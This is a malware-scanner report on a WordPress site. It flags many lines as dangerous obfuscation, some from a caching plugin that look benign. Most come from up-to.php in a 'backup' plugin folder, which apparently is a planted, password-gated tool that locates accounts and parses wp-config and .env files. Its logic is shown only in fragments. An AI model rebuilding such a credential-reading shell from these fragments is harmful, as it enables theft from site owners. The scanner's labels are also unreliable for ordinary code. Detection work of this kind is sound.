</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"wp_fastest_cache_mobile_theme_obj"</span><span style="color: #007700">]-></span><span style="color: #0000BB">get_template</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 190</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_load_mobile_theme</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 191</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">"wp_fastest_cache_mobile_theme_obj"</span><span style="color: #007700">]-></span><span style="color: #0000BB">get_stylesheet</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_plugin_action_links</span><span style="color: #007700">(</span><span style="color: #0000BB">$links</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_delete_webp</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lazy_load_for_script</span><span style="color: #007700">(</span><span style="color: #0000BB">$tag</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span><span style="color: #DD0000">".</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">s</span><span style="color: #007700">){</span><span style="color: #DD0000">".</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return;}</span><span style="color: #DD0000">".</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$tmp_script</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$tag</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_server_time_ajax_request</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_server_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 83</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"fsockopen"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_525").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/backup_1781207797/up-to.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 182.30 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-06-11 22:56:39</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-06-11 22:56:39</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 292</span><br><table id="file_526" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">disabled</span><span style="color: #007700">=</span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'💾 Сохранить'</span><span style="color: #007700">; </span><span style="color: #0000BB">msg</span><span style="color: #007700">.</span><span style="color: #0000BB">className</span><span style="color: #007700">=</span><span style="color: #DD0000">'modal-msg error'</span><span style="color: #007700">; </span><span style="color: #0000BB">msg</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'❌ '</span><span style="color: #007700">+</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">; }); } </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">addEventListener</span><span style="color: #007700">(</span><span style="color: #DD0000">'click'</span><span style="color: #007700">,function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_mode</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_pwd_salt</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'u2_scan_v1'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dir_is_readable</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return @</span><span style="color: #0000BB">scandir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1156</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_public_html_in_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">null</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_account_paths</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_password_expected_hash</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1180</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$paths</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">path_is_deep_subfolder</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#/(wp-content|themes|plugins|mu-plugins|dist|vendor|node_modules|cache|uploads)(/|$)#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">collect_scan_dir_candidates</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 118</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_APP_PWD_CIPHER</span><span style="color: #007700">, </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$raw </span><span style="color: #007700">!== </span><span style="color: #0000BB">false </span><span style="color: #007700">&& </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$raw</span><span style="color: #007700">) === </span><span style="color: #0000BB">32</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$raw </span><span style="color: #007700">: </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'UP_TO_WP_MODE'</span><span style="color: #007700">) && </span><span style="color: #0000BB">UP_TO_WP_MODE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_verify_password</span><span style="color: #007700">(</span><span style="color: #0000BB">$plain</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_values</span><span style="color: #007700">(</span><span style="color: #0000BB">$unique</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">score_scan_candidate</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">hash_equals</span><span style="color: #007700">(</span><span style="color: #0000BB">$expected</span><span style="color: #007700">, </span><span style="color: #0000BB">$actual</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$score</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">resolve_scan_roots</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_auth_token</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">hash</span><span style="color: #007700">(</span><span style="color: #DD0000">'sha256'</span><span style="color: #007700">, </span><span style="color: #0000BB">app_password_expected_hash</span><span style="color: #007700">() . </span><span style="color: #DD0000">'|' </span><span style="color: #007700">. </span><span style="color: #0000BB">session_id</span><span style="color: #007700">() . </span><span style="color: #DD0000">'|' </span><span style="color: #007700">. </span><span style="color: #0000BB">up_to_wp_runtime_base_dir</span><span style="color: #007700">());</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'score'</span><span style="color: #007700">] - </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'score'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1293</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">]) - </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 130</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_is_authenticated</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$readable</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">10</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'up_to_auth'</span><span style="color: #007700">]) && </span><span style="color: #0000BB">hash_equals</span><span style="color: #007700">(</span><span style="color: #0000BB">app_auth_token</span><span style="color: #007700">(), (string) </span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'up_to_auth'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_env</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$vars</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1347</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_wp_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
